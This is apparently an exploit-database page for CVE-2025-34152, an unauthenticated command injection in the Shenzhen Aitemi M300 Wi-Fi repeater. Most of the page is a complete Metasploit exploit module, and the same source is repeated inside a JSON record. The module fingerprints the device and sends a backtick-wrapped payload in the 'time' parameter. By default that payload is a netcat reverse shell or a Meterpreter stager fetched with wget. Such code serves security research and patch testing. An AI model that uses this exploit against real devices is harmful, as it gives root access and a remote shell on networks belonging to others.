📄 Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated Remote Code Execution

9.4 / 10

CRITICAL

CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/SC:H/VI:H/SI:H/VA:H/SA:H

Description

This Metasploit module exploits an unauthenticated remote command injection...

Visit Original Source

Basic Information

ID PACKETSTORM:209361

Published Sep 10, 2025 at 00:00

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'digest'

class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (time param)',
'Description' => %q{
This module exploits an unauthenticated remote command injection vulnerability
in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02). The vulnerability
lies in the 'time' parameter of the time configuration endpoint, which is passed
unsanitized to a shell command executed via the `date -s` mechanism. The injection
executes with root privileges, without requiring authentication, reboot, or
network reconfiguration.
},
'Author' => [
'Valentin Lobstein' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/'],
['CVE', '2025-34152']
],
'Platform' => %(linux unix),
'Arch' => [ARCH_CMD, ARCH_MIPSBE],
'Payload' => {
'BadChars' => "\x60"
},
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat'
}
}
],
[
'Linux Meterpreter MIPSBE (MAY crash HTTP worker)',
{
'Platform' => 'linux',
'Arch' => [ARCH_CMD, ARCH_MIPSBE],
'DefaultOptions' => {
'FETCH_DELETE' => true,
'FETCH_COMMAND' => 'WGET',
'FETCH_WRITABLE_DIR' => '/tmp',
'PAYLOAD' => 'cmd/linux/http/mipsbe/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'Privileged' => true,
'DisclosureDate' => '2025-08-07',
'Notes' => {
'Stability' => [CRASH_SERVICE_DOWN],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
end

def check
fingerprint_hits = []

res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'favicon.ico')
)

return CheckCode::Unknown('No response from target') unless res
return CheckCode::Safe('favicon.ico not found') unless res.code == 200

hash = Digest::SHA256.hexdigest(res.body)
if hash == 'eed1926b9b10ed9c54de6215dded343d066f7e447a7b62fe9700b7af4b34d8ee'
print_good('Favicon hash matched – likely Aitemi M300 device')
fingerprint_hits << 'favicon'
end

server_header = res.headers['Server']
if server_header&.start_with?('lighttpd/1.4.32')
print_good("HTTP server version matched: #{server_header}")
fingerprint_hits << 'httpd'
end

%w[index.html home.html].each do |page|
res_html = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, page)
)

next unless res_html&.code == 200

if res_html.body.include?('langen.js') && res_html.body.include?('dw(TT_SetWifiExt)')
print_good("HTML fingerprint matched in #{page} – UI strings detected")
return CheckCode::Appears('HTML language markers confirmed')
end
end

if fingerprint_hits.any?
return CheckCode::Detected("Partial match: #{fingerprint_hits.join(', ')}")
end

CheckCode::Unknown('No identifiable fingerprint found')
end

def exploit
raw_payload = "`#{payload.encoded}`"
encoded_payload = CGI.escape(raw_payload).gsub('+', '%20')

send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'protocol.csp?'),
'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
'data' => "fname=system&opt=time_conf&function=set&time=#{encoded_payload}"
)
end
end

{
    "lastseen": "2025-09-10T16:12:55",
    "description": "This Metasploit module exploits an unauthenticated remote command injection...",
    "published": "2025-09-10T00:00:00",
    "modified": "2025-09-10T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:209361",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-34152"
    ],
    "sourceData": "##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    require 'digest'\n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = GoodRanking\n    \n      include Msf::Exploit::Remote::HttpClient\n      prepend Msf::Exploit::Remote::AutoCheck\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (time param)',\n            'Description' => %q{\n              This module exploits an unauthenticated remote command injection vulnerability\n              in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02). The vulnerability\n              lies in the 'time' parameter of the time configuration endpoint, which is passed\n              unsanitized to a shell command executed via the `date -s` mechanism. The injection\n              executes with root privileges, without requiring authentication, reboot, or\n              network reconfiguration.\n            },\n            'Author' => [\n              'Valentin Lobstein' # Vulnerability discovery and Metasploit module\n            ],\n            'License' => MSF_LICENSE,\n            'References' => [\n              ['URL', 'https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/'],\n              ['CVE', '2025-34152']\n            ],\n            'Platform' => %(linux unix),\n            'Arch' => [ARCH_CMD, ARCH_MIPSBE],\n            'Payload' => {\n              'BadChars' => \"\\x60\"\n            },\n            'Targets' => [\n              [\n                'Unix Command',\n                {\n                  'Platform' => 'unix',\n                  'Arch' => ARCH_CMD,\n                  'DefaultOptions' => {\n                    'PAYLOAD' => 'cmd/unix/reverse_netcat'\n                  }\n                }\n              ],\n              [\n                'Linux Meterpreter MIPSBE (MAY crash HTTP worker)',\n                {\n                  'Platform' => 'linux',\n                  'Arch' => [ARCH_CMD, ARCH_MIPSBE],\n                  'DefaultOptions' => {\n                    'FETCH_DELETE' => true,\n                    'FETCH_COMMAND' => 'WGET',\n                    'FETCH_WRITABLE_DIR' => '/tmp',\n                    'PAYLOAD' => 'cmd/linux/http/mipsbe/meterpreter/reverse_tcp'\n                  }\n                }\n              ]\n            ],\n            'DefaultTarget' => 0,\n            'Privileged' => true,\n            'DisclosureDate' => '2025-08-07',\n            'Notes' => {\n              'Stability' => [CRASH_SERVICE_DOWN],\n              'Reliability' => [REPEATABLE_SESSION],\n              'SideEffects' => [IOC_IN_LOGS]\n            }\n          )\n        )\n      end\n    \n      def check\n        fingerprint_hits = []\n    \n        res = send_request_cgi(\n          'method' => 'GET',\n          'uri' => normalize_uri(target_uri.path, 'favicon.ico')\n        )\n    \n        return CheckCode::Unknown('No response from target') unless res\n        return CheckCode::Safe('favicon.ico not found') unless res.code == 200\n    \n        hash = Digest::SHA256.hexdigest(res.body)\n        if hash == 'eed1926b9b10ed9c54de6215dded343d066f7e447a7b62fe9700b7af4b34d8ee'\n          print_good('Favicon hash matched \u2013 likely Aitemi M300 device')\n          fingerprint_hits << 'favicon'\n        end\n    \n        server_header = res.headers['Server']\n        if server_header&.start_with?('lighttpd/1.4.32')\n          print_good(\"HTTP server version matched: #{server_header}\")\n          fingerprint_hits << 'httpd'\n        end\n    \n        %w[index.html home.html].each do |page|\n          res_html = send_request_cgi(\n            'method' => 'GET',\n            'uri' => normalize_uri(target_uri.path, page)\n          )\n    \n          next unless res_html&.code == 200\n    \n          if res_html.body.include?('langen.js') && res_html.body.include?('dw(TT_SetWifiExt)')\n            print_good(\"HTML fingerprint matched in #{page} \u2013 UI strings detected\")\n            return CheckCode::Appears('HTML language markers confirmed')\n          end\n        end\n    \n        if fingerprint_hits.any?\n          return CheckCode::Detected(\"Partial match: #{fingerprint_hits.join(', ')}\")\n        end\n    \n        CheckCode::Unknown('No identifiable fingerprint found')\n      end\n    \n      def exploit\n        raw_payload = \"`#{payload.encoded}`\"\n        encoded_payload = CGI.escape(raw_payload).gsub('+', '%20')\n    \n        send_request_cgi(\n          'method' => 'POST',\n          'uri' => normalize_uri(target_uri.path, 'protocol.csp?'),\n          'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',\n          'data' => \"fname=system&opt=time_conf&function=set&time=#{encoded_payload}\"\n        )\n      end\n    end",
    "sourceHref": "https://packetstorm.news/download/209361",
    "cvss": {
        "score": 9.4,
        "severity": "CRITICAL",
        "vector": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/SC:H/VI:H/SI:H/VA:H/SA:H",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/209361/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated Remote Code Execution_PACKETSTORM:209361

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply